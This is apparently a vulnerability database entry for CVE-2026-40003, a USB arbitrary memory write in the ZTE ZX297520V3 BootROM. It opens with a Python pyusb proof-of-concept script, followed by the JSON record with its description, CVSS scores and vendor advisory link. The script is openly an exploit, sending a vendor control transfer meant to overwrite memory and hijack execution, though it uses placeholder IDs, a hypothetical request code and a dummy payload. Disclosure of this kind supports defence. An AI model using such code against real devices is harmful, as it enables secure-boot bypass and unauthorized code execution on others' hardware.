CVE-2026-40003

import usb.core import usb.util # PoC for CVE-2026-40003: ZTE ZX297520V3 BootROM Arbitrary Memory Write # This script demonstrates the concept of writing to an arbitrary address via USB. # Target: ZTE ZX297520V3 in USB Download Mode VID = 0xXXXX # Replace with actual Vendor ID PID = 0xXXXX # Replace with actual Product ID def exploit(): # Find the device dev = usb.core.find(idVendor=VID, idProduct=PID) if dev is None: raise ValueError('Device not found') # Claim the interface dev.set_configuration() # Target Memory Address (Example: Stack Address or Function Pointer) # The vulnerability allows writing to any address. target_address = 0x40008000 # Payload to write (e.g., shellcode or ROP gadget address) payload = b'\x00\x00\x00\x00' print(f"[*] Sending payload to address: {hex(target_address)}") # Construct the specific control transfer or bulk transfer # based on the ZTE USB protocol. # This is a generic representation of the vulnerability trigger. try: # Send data to the specific address without validation dev.ctrl_transfer( bmRequestType=0x40, # Vendor specific, Host to Device bRequest=0xA0, # Write command (hypothetical) wValue=(target_address & 0xFFFF), wIndex=(target_address >> 16), data_or_wLength=payload, timeout=1000 ) print("[+] Payload sent successfully. Execution flow may be hijacked.") except usb.core.USBError as e: print(f"[-] Error during transfer: {e}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-40003", "sourceIdentifier": "[email protected]", "published": "2026-05-07T02:16:03.453", "lastModified": "2026-05-13T19:19:26.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZTE ZX297520V3 BootROM contains a vulnerability that allows arbitrary memory writes via USB. Attackers can exploit the lack of target address validation in the USB download mode to write data to any location in BootROM runtime memory, thereby overwriting the stack, hijacking the execution flow, bypassing the Secure Boot signature verification mechanism, and achieving unauthorized code execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.4, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zte:zx297520v3_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "6E69F8B0-75E7-4BD9-A4C7-4F3CF428CEE7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zte:zx297520v3:-:*:*:*:*:*:*:*", "matchCriteriaId": "B664C83E-0249-47BB-A3AD-1E9C4DF34206"}]}]}], "references": [{"url": "https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2144487415169560645", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}